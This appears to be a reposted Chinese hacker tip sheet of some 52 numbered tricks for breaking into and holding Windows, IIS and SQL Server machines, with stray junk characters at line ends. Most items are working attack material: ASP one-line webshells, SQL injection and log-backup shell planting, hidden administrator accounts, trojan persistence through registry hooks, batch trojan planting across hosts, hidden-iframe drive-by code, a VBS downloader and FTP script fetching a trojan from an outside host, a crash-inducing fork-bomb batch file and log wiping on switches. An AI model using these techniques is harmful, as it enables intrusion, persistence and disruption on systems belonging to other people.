Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
" i! b8 H& W/ b) N8 F8 Q+ C) Wcacls C:\windows\system32 /G hqw20:R& V/ f: w( T. S# }" Z
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
% Z0 s) J0 k6 z* \& t$ B恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F! M* ~3 r* y7 z4 V
8 F. l6 a7 T3 c2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
! n, F8 |& I+ V, i- m8 j' g1 F( e( [" n: @' c. H: N! X
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
: ?6 ]8 J& ~) q9 \' n! m1 c0 s# G2 q0 X
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号: S8 R6 e9 W7 T" ~) ]
3 F; z/ A% j" G; A
5、利用INF文件来修改注册表
4 L7 q4 r5 U# `1 {% P5 a[Version]/ V( Q- b4 F$ O O1 T
Signature="$CHICAGO$"
7 g2 t1 X/ d" O1 u* m$ i$ w, U2 T8 ][Defaultinstall], i# k$ ]7 N1 E- l! f
addREG=Ating
( L% ] w5 l: y1 d1 ]; |7 |4 t" n[Ating]0 `. l, j ]4 h
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"& ]) M5 a7 ~ }7 C, H4 ^' E
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:2 w' V" Y$ i7 S4 o6 W
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
, @; r! Y! V6 J) ^其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU x9 t; M( L& Z7 M9 l
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU5 Z7 z9 ^7 Y8 f% E! r
HKEY_CURRENT_CONFIG 简写为 HKCC
+ w* ?+ D7 a% d z0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
! M* p* ?+ m! n1 v5 o"1"这里代表是写入或删除注册表键值中的具体数据7 ]9 k2 H* i7 ^% ^ A% y) C+ s
+ Y% A6 }+ c) M
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
6 ~' ?5 K8 N) J8 k多了一步就是在防火墙里添加个端口,然后导出其键值
8 z' Q/ V. f y& ?[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]: _+ `. `- ^. g
1 `- `; U: D% i: K3 R3 k7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
$ E U6 ^: {* t: T- [& Q在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。; L6 Q! s$ ~ ?# G* |# ?( x
* d! L( a1 Z" W# V7 D7 t" v
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。5 C5 U/ i& P9 p& W/ q4 g
1 e/ s. k; E+ q& B: o3 e* n
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
# p0 v6 N3 r( Y/ _: e可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。' u) z2 r9 v, H
) L/ _5 y: ?% U5 F* h10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”! F- [# e. E2 v" r
$ Q9 k" n4 Q/ Y, O: ^% l% R& M: w11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
9 I1 ]$ j+ q2 A( g* Y用法:xsniff –pass –hide –log pass.txt5 n" h! V+ m- R+ N9 _
8 b. ^3 s0 q! Z/ t7 v; j12、google搜索的艺术* S. c$ f. ]. e" K
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”% S0 i$ o2 A, b/ \4 Z5 b
或“字符串的语法错误”可以找到很多sql注入漏洞。3 U% @3 B! z0 n6 S, @
* P% l2 I3 T" F0 _ v13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
) r P l: t# T7 f$ V, Q% H+ k8 K- L; [7 j7 a3 Y* s9 O
14、cmd中输入 nc –vv –l –p 1987
$ W$ N' b9 Y7 c5 ]! d0 ~+ T做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
3 f7 I. G, P# L, M( P+ K" T0 |
. ? q! Z3 g; n/ i15、制作T++木马,先写个ating.hta文件,内容为) {! ^, N( Z2 Z: C* @
<script language="VBScript">- a8 o) o# j$ b% r0 _
set wshshell=createobject ("wscript.shell" )
& S& R# u! s% v) @% N xa=wshshell.run("你马的名称",1)
( r6 m/ V. G" {6 Gwindow.close
$ W) B3 V* c( ]% O, t& d</script>
9 L O5 s* ~3 s再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。& U$ N: P1 t. O" [: C
7 i% g6 g" a/ b4 X* a+ \4 Q' _$ C* f0 w16、搜索栏里输入4 _$ {; o( v! s! C. D% Q
关键字%'and 1=1 and '%'='
/ B/ P, [6 y) _8 |- Y5 ~关键字%'and 1=2 and '%'='
: s# Q2 t# ~! q比较不同处 可以作为注入的特征字符
6 V- ^' P) o7 K0 b' N+ B0 K9 P$ r# z& _. s( k, N
17、挂马代码<html>
& [& Q2 M4 m! B<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
8 U- B3 T$ Y( q+ X, Y4 w</html>9 B0 g5 h0 M7 M
- g0 F3 ]& o- A. r; K18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
+ Y& V% o% }: a/ w8 f) k* Ynet localgroup administrators还是可以看出Guest是管理员来。6 H' O* v! C8 r. |
4 x8 A# d1 X3 R9 f# k- L; D! g
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等, W- D5 J6 W6 g
用法: 安装: instsrv.exe 服务名称 路径
% |0 i6 S: f* L {- M卸载: instsrv.exe 服务名称 REMOVE3 o4 X* L2 r( y+ U
! x4 C. T W( p& D3 y; {. C- f5 x& S& t, w3 {
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉) W9 N6 g* h5 I3 N9 `! S& w) N
不能注入时要第一时间想到%5c暴库。
" s; o7 K! v& z# y
( v$ [: H9 g, J# X+ v22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~# t' l8 s0 H2 b8 g- r6 t+ \& V& ~
m! S$ Y& M; B23、缺少xp_cmdshell时
! G- v" ~9 f) ^3 ?尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
2 J. U* b) x: c" O假如恢复不成功,可以尝试直接加用户(针对开3389的)
`3 |6 N6 D% x* i! R: ~8 ndeclare @o int
8 q, o+ `+ A! g% u$ sexec sp_oacreate 'wscript.shell',@o out
+ B& M7 i/ r) M6 oexec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
3 G% n; q( K6 N
+ p# a' |) d& Z9 D/ h, s: m' e# y24.批量种植木马.bat* A# T) S' W& t5 {* k
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
f/ E' Q- m( h$ rfor /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间* G0 z+ r( t; W0 h( x7 e
扫描地址.txt里每个主机名一行 用\\开头' X v* x' k$ B1 b2 B
9 m# L# P3 ^' D, z0 f- C
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。. [1 \0 b X$ X; k3 J
% W& ~/ w6 `+ e5 v' i26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.& F0 n7 I& j+ ~! {
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
6 ]9 X& a* J; E: ]: Q: f n; w% a.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
& @3 w% F3 j. X& W" c$ M1 j0 C
" \: A+ E6 C& b7 J27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
* d: W3 J) w* J* ~( Q然后用#clear logg和#clear line vty *删除日志
5 w: [6 B$ J! x" G: i
+ C, ?! \5 j1 ]5 l! U28、电脑坏了省去重新安装系统的方法
$ ]6 n0 Z& i: H; w' B& _纯dos下执行,
1 S* e( ]% b2 Y. j6 e- ^6 c- ixp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
* g, C( l3 B9 J2 h' U8 M5 b0 d2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config' G/ ~2 p4 x4 z8 [8 }0 L' a
* G" ]6 E2 [" f5 M1 U, C
29、解决TCP/IP筛选 在注册表里有三处,分别是:
# x- B0 w t+ B F8 U5 zHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip, {: [6 m3 S; d% x( Q9 x+ o g
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
- T- v% G5 F1 {! q; r$ J% w. WHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip+ T* S3 i0 o3 _& G5 j
分别用- U6 B1 h' t( j7 ^
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip4 R( b C& j' U
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip. p( v, B+ X. [. o
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip' `/ {+ f3 u* O L, g. H2 @
命令来导出注册表项
4 E1 |; ^' t1 u& U: i4 _& n4 B _然后把三个文件里的EnableSecurityFilters"=dword:00000001,
4 b" `* m& O( n改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用, Y( f% l, v4 X
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
% i% Y8 {$ M8 {8 q) U. G; s Q$ Z) N) W$ \
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U! D1 K8 n& M5 v' X! [6 d9 a
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的38 `- Q1 o3 x5 a! {* [
" I9 D" [- E& y
31、全手工打造开3389工具5 ~, @3 B. n9 K1 O0 k) g5 ]
打开记事本,编辑内容如下:
+ l* y/ x( e; R" V7 N3 Pecho [Components] > c:\sql
5 i8 F$ _& O' w: D% Wecho TSEnable = on >> c:\sql1 u" [$ Y& U& g# N5 U# n
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q4 ~/ o* Z; V x; A2 I: p+ N, v/ s; O
编辑好后存为BAT文件,上传至肉鸡,执行% X" ?+ `. c/ s3 f4 V
9 b- }8 g' p6 c% {32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马3 z& f5 V% u: q- K# d
0 E: [7 K' d5 F+ `
33、让服务器重启
X* A" m. ]( c写个bat死循环:: y9 T: @& I" k( A
@echo off
: L0 k0 m9 R; V& E:loop1
' |% F: ?" o: [. icls
6 R+ y( w' @. g) ~- h+ O; Cstart cmd.exe9 ~1 |# A) N( c Q2 F; n
goto loop1
" a/ B5 G0 O1 q5 ~ }) o6 ]保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启. f# l% M' X+ `- d% F% B/ D h( D& ?
2 w: a' `0 Q( j7 O( I' k& |$ x( K
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,& a! z$ K1 X6 E4 N. M2 j% m
@echo off
* T; R6 g. t7 [3 Q. T) A$ y" n+ r) vdate /t >c:/3389.txt) c* X- q# L. u$ \
time /t >>c:/3389.txt
; F1 U* U. Y5 H- S' \attrib +s +h c:/3389.bat
2 { z* R9 [0 P9 r1 i* Lattrib +s +h c:/3389.txt
0 B2 S. H/ J. r6 Xnetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
+ |' l/ [$ J( M) E$ ^0 ?" Z2 W4 f# V并保存为3389.bat3 f: P6 X% I& K
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号) w. y& Q) e# k9 a1 D5 `- S5 g0 f
( g# D, Z6 i+ n
35、有时候提不了权限的话,试试这个命令,在命令行里输入:
& @! p. G1 G B) h3 T4 [ x( ?1 _start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
+ M# Q* _" h4 p3 v9 L% B( h2 `输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
i1 i$ T. w) s& D( i, w# p% \# |7 @: ^2 z9 c# U! B3 _, J
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件8 f) @% O! D& T
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址5 O: g7 G3 a3 I7 @
echo 你的FTP账号 >>c:\1.bat //输入账号
4 Z" S# y7 F+ u2 o. Uecho 你的FTP密码 >>c:\1.bat //输入密码& x/ m2 ], `& f$ I0 ~% ~
echo bin >>c:\1.bat //登入
/ J# t& {2 J, k4 T! aecho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
- n+ x/ k" ^" vecho bye >>c:\1.bat //退出
; S4 J, K7 w6 G: w; L然后执行ftp -s:c:\1.bat即可; `0 D6 } s! a* ]8 w8 p( B
) U! P( \; [9 l) c37、修改注册表开3389两法# I! v" S9 {+ S2 m( f) g
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
) @* N0 w( F7 Z( W7 i$ w* ]& ~echo Windows Registry Editor Version 5.00 >>3389.reg1 ]/ Y2 H4 }( J8 q) q2 U
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg( k( e& T5 i( Y; ^8 X# K. w
echo "Enabled"="0" >>3389.reg
1 M( x, Z3 C" Z+ J4 ]# kecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows; [( |1 O$ m& k3 a* k5 b3 G' h
NT\CurrentVersion\Winlogon] >>3389.reg6 J2 `2 L% M, w% Z( K% j
echo "ShutdownWithoutLogon"="0" >>3389.reg1 Y- }) A' [* \0 z J, X. {. o
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]' _3 o. R! \* X/ m: e$ X6 s
>>3389.reg' L6 H; P* S& U7 S" x+ h# O: y0 `
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
# j: O7 [+ ~, c) k9 C% k5 ^echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
) l- \& o: G7 C( V8 s% T>>3389.reg2 m+ T& m; Z; R$ ]7 L. `+ n) c% n
echo "TSEnabled"=dword:00000001 >>3389.reg# W1 Q' x0 N8 S
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg9 K, d4 ` v- ?+ j* h% [
echo "Start"=dword:00000002 >>3389.reg
* A& H% G( }6 x9 ?* ~0 u4 pecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
. ^! H2 C- J0 [% c* B* c- ?>>3389.reg1 N1 ~/ a8 M z8 e7 F8 m d
echo "Start"=dword:00000002 >>3389.reg T" n: n7 V: m! u! Y5 }& `
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg* V8 {' `' Y# a! `/ G, x% ]* r* Y% y. R
echo "Hotkey"="1" >>3389.reg& R$ j+ B; K- k" F7 I, h
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal% V' a+ B5 m8 |! H4 @# Z4 e
Server\Wds\rdpwd\Tds\tcp] >>3389.reg
9 s8 d. n+ j3 A B( y! J% _echo "PortNumber"=dword:00000D3D >>3389.reg
- [ C) ~8 W+ B0 |' Vecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal2 F) T5 t5 a/ Y/ s! W7 c$ L
Server\WinStations\RDP-Tcp] >>3389.reg3 p4 D J- v3 K3 L w7 S$ D
echo "PortNumber"=dword:00000D3D >>3389.reg7 F( t4 E3 D0 L
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
9 ~$ o% M& z* b(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
* R8 h- b+ ]8 }# B. N; d4 `$ Z因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
7 z1 H& Q f' K$ @# H6 e2 {(2)winxp和win2003终端开启) M' r/ T: G9 f p- M, d) {
用以下ECHO代码写一个REG文件:
1 P5 r( ]% z- F- w- c$ q h$ y1 kecho Windows Registry Editor Version 5.00>>3389.reg
+ x3 D' y3 n+ I7 h* K! recho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
- A4 Y3 q7 z. N! a4 {! ^8 ~' OServer]>>3389.reg9 X% l2 u: D' k+ J: S" k
echo "fDenyTSConnections"=dword:00000000>>3389.reg* X; K& k; @. ^
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
/ t3 j( I# p* z& R: Y& VServer\Wds\rdpwd\Tds\tcp]>>3389.reg4 P8 y+ L. y1 A4 V5 z
echo "PortNumber"=dword:00000d3d>>3389.reg" r, G% J9 A. Y! g3 G2 ~# V0 X
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
8 [8 D9 W# c) b) E, sServer\WinStations\RDP-Tcp]>>3389.reg# W. R' N I* P5 `, u
echo "PortNumber"=dword:00000d3d>>3389.reg
2 L2 y6 [4 b9 c/ T然后regedit /s 3389.reg del 3389.reg; I! K1 a9 N1 H; ?1 K
XP下不论开终端还是改终端端口都不需重启
9 o. l/ }4 A9 ~) I0 G* B# w3 ], v* W8 I4 v2 c- \
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃! a1 d5 T+ T& p( R" g1 w
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
- R9 H2 |( _4 \+ } T/ G; J7 C; I8 A
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!8 A; E% O2 _& e" Y, M: m0 h U8 _) }" |
(1)数据库文件名应复杂并要有特殊字符) X7 I7 Q3 ]5 U
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源9 i: r# x# g) W5 C8 Z5 a
将conn.asp文档中的
4 ^- v" X/ A* QDBPath = Server.MapPath("数据库.mdb")0 w8 K! O' m7 H7 p |
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath% h# ?3 _3 A8 {
% x5 S! o+ I* o( Y& w; A
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置( F, k( ~% t H) N: j2 n
(3)不放在WEB目录里
: _0 w9 ~1 y1 K2 x* k0 {2 C# [$ m- x, @8 P9 B) O' Z
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
$ F! _4 v- B) m& E8 z+ _2 C K w7 g可以写两个bat文件
' O3 E& D# E; g1 B6 N@echo off( o! e% Y5 s' d8 o/ W$ J9 S
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
9 q' J2 k n: A7 l; l@del c:\winnt\system32\query.exe2 n+ A( ]- |+ e* R# |
@del %SYSTEMROOT%\system32\dllcache\query.exe
; H/ h3 w! g: u% {( D- S( K8 F$ q@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
6 s D: I/ P( W3 J! h* R
/ b' r. K. P) U; B: S3 w, |+ ^@echo off
* |" w; N8 r) `@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe; H- `# G4 ]2 M' c
@del c:\winnt\system32\tsadmin.exe. `: T+ g6 o/ G& H
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex8 g C2 ]! P6 L! K, M3 {5 s
; e7 @" Y# r4 \# H. p! w
41、映射对方盘符
" D2 i0 X) _ M8 |+ u) h4 etelnet到他的机器上,* b# K7 _, w' B9 ~
net share 查看有没有默认共享 如果没有,那么就接着运行
A" [- D A$ n2 ?, Lnet share c$=c:8 k( c, E& D- n, M7 i: D6 x
net share现在有c$
% S" d9 q" _' n" b在自己的机器上运行5 I+ w% {+ _5 P* k% o% {+ l
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K; W \1 l6 D9 P0 p, M
% i( _' t; L/ p- f: Y+ m9 [
42、一些很有用的老知识
: v: `: r4 \- i& J3 K2 S' Dtype c:\boot.ini ( 查看系统版本 )
5 S. s" L9 q, R! ^0 N" ]& pnet start (查看已经启动的服务)
5 |! p( h; h- W& v# n$ Yquery user ( 查看当前终端连接 )
# G0 O% H+ f- k& snet user ( 查看当前用户 )
; l( U. _- o, Dnet user 用户 密码/add ( 建立账号 )8 k! Q: d) w: Z' f
net localgroup administrators 用户 /add (提升某用户为管理员)
0 Y. }$ _4 Q. E1 f5 Vipconfig -all ( 查看IP什么的 )! p" ^) X; K3 F3 V% ]2 {
netstat -an ( 查看当前网络状态 )
" z& Y" i2 a0 A8 f; m7 ^0 F4 jfindpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)% z: T1 S& q1 }3 L0 L! n
克隆时Administrator对应1F4
6 Y( o9 u5 F$ s0 A" vguest对应1F55 T0 h/ s' N4 o5 ^
tsinternetuser对应3E8) U( [! Z* C6 l
7 G# R+ n$ \' h1 I' H+ ~43、如果对方没开3389,但是装了Remote Administrator Service
) }& i) O& n( m: [用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
: N1 a/ e& x% z* y: P/ |9 O解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
$ S d8 q7 c3 n$ z) c& E; q先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"# c0 ]/ k- R' M. @. }
, `6 k$ o! A/ ]. f2 G44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
9 j* @! f* m6 G3 l; p* \- L本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)5 e+ P" N" |0 K* z$ }
7 L/ ?+ o- v+ k; F+ Z: o$ M45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入): x# e. ]5 _& E- G) @+ `* k
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open% C* r& g8 Q5 Q) f3 M
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
% O. O0 Q+ |; `0 NCreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =9 K1 X z* K: D0 d: p9 y
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
% X* z' k0 i$ p# Y" H1 b" P(这是完整的一句话,其中没有换行符)" }4 S9 S; w1 n+ c1 _7 P
然后下载:& r7 }9 E5 K% w9 K7 D2 \9 [
cscript down.vbs http://www.hack520.org/hack.exe hack.exe
3 M7 f4 E5 D8 k3 l0 p& s( E0 W! V/ z& W; [0 f" S4 \
46、一句话木马成功依赖于两个条件:5 J- u# M7 E, R# x' k+ C
1、服务端没有禁止adodb.Stream或FSO组件
! t2 z* _ e5 {# u2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
7 C3 ?6 j- w% ^9 \7 l6 E7 c7 @8 Z1 ?4 t8 A C
47、利用DB_OWNER权限进行手工备份一句话木马的代码: a$ L- `, r3 |7 B
;alter database utsz set RECOVERY FULL--
7 z7 v# [0 L* I;create table cmd (a image)--
: }+ O# b4 K. Q* x/ j4 Q }7 I8 m$ K;backup log utsz to disk = 'D:\cmd' with init--' w6 T0 X# G; F/ N0 R! O# |
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
! a" k' m% c, F( G: q% F8 e;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--, e+ X8 N3 F" e/ V0 T/ m
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
) {7 G5 Z) c% T9 _ E+ l( \3 h7 r. p( x9 }6 j9 Q) H- P" T
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
9 j0 R4 V8 V* Y$ _
5 k$ y# q( B4 l3 [用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options( |+ Q ?0 B7 I/ ?7 L. P! b2 J
所有会话用 'all'。# L) p7 g+ \" H# _
-s sessionid 列出会话的信息。- ]1 g8 l2 E! |8 e4 Z6 w4 M; `2 l
-k sessionid 终止会话。
. w. W3 j# [( [' J8 L-m sessionid 发送消息到会话。8 |! a- `: W% c: |. f5 Q3 R: [
+ L" f5 B( X: j1 ^( s0 hconfig 配置 telnet 服务器参数。! h6 G8 B- Q& g0 L' g
; A# A, p3 {7 S( P' C% `( D) C" ^
common_options 为:
) n. U! m6 J4 Z/ V7 N-u user 指定要使用其凭据的用户
& M& c) C3 u# y6 z-p password 用户密码
7 l2 n1 M0 [% g0 ]9 H& d& E* K0 O/ h; T j4 e1 Y9 h; k
config_options 为:/ s' K2 P3 Z; L% |; _4 T4 q
dom = domain 设定用户的默认域9 k5 P& |/ o! `! d5 Y0 V$ n* c1 T* ^
ctrlakeymap = yes|no 设定 ALT 键的映射
9 ~7 M9 @+ o% A( ^8 Ltimeout = hh:mm:ss 设定空闲会话超时值* x( D: q9 h( O0 h
timeoutactive = yes|no 启用空闲会话。$ H* G' F2 i: x# J8 S; K/ Z
maxfail = attempts 设定断开前失败的登录企图数。& B% L o& r' i* j5 n# M( X
maxconn = connections 设定最大连接数。3 m3 A8 T3 g& G- v' M: w" j
port = number 设定 telnet 端口。* b6 u( i- W) A- q
sec = [+/-]NTLM [+/-]passwd8 R/ R; f% P4 ?" H- _
设定身份验证机构
3 x4 O" ?, Z2 {7 b/ k( rfname = file 指定审计文件名。9 y0 P5 f( V: w2 i8 d
fsize = size 指定审计文件的最大尺寸(MB)。
1 ~' K# \% t% P- F, ^' L" zmode = console|stream 指定操作模式。( _- r( M+ q2 O- h0 n& i
auditlocation = eventlog|file|both
3 ^2 k9 w3 x! y4 l$ e+ V- V$ @指定记录地点
* ]9 y6 Z* ?: b7 e' J, Vaudit = [+/-]user [+/-]fail [+/-]admin
$ F. `; N. @3 q( I6 w2 c' i0 n) b% E! C# b
49、例如:在IE上访问:
! v( f0 K* g) ^www.hack520.org/hack.txt就会跳转到http://www.hack520.org/
# N u$ J2 i% j1 E7 B* rhack.txt里面的代码是:7 ?! g# m# `, K0 I
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
& j3 \/ P2 j7 l把这个hack.txt发到你空间就可以了!/ {6 u8 Z& h0 o1 i+ Q' {8 ^, p4 |, h
这个可以利用来做网马哦!9 o0 b" Q2 a& P
- K7 q2 p* O) V7 t3 `9 s6 ?
50、autorun的病毒可以通过手动限制!& z. M, A8 `# p6 C. M1 C( I
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!1 i ?- C$ M) ^7 [! m" P( Z
2,打开盘符用右键打开!切忌双击盘符~$ b* j$ W. z8 f8 a- C
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!2 x7 o/ f! P1 O( d' V
0 E( x9 }+ J7 r3 e: |" v
51、log备份时的一句话木马:( d( ^8 R. P% a o* i9 ~, K% F; Z
a).<%%25Execute(request("go"))%%25>$ p$ R: e/ B2 \6 z. ]
b).<%Execute(request("go"))%>
( y. z, t& F# Q5 A; fc).%><%execute request("go")%><%0 g0 L1 n/ E( c- O. ]" Q9 B
d).<script language=VBScript runat=server>execute request("sb")</Script>0 |. k- a+ E5 e# A" h- m
e).<%25Execute(request("l"))%25>2 h# \4 W5 E3 @8 K. R5 {* N
f).<%if request("cmd")<>"" then execute request("pass")%>
3 C( e& K4 ?) P
' f. E3 n4 W7 j8 B, E52、at "12:17" /interactive cmd& m8 H3 Z& f. n. Z- j
执行后可以用AT命令查看新加的任务
$ ^" N; O5 Z( d$ |0 o1 ]) u9 m用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
; B% d+ i. K' l, G" [! i# e% ]; q- x$ f7 A
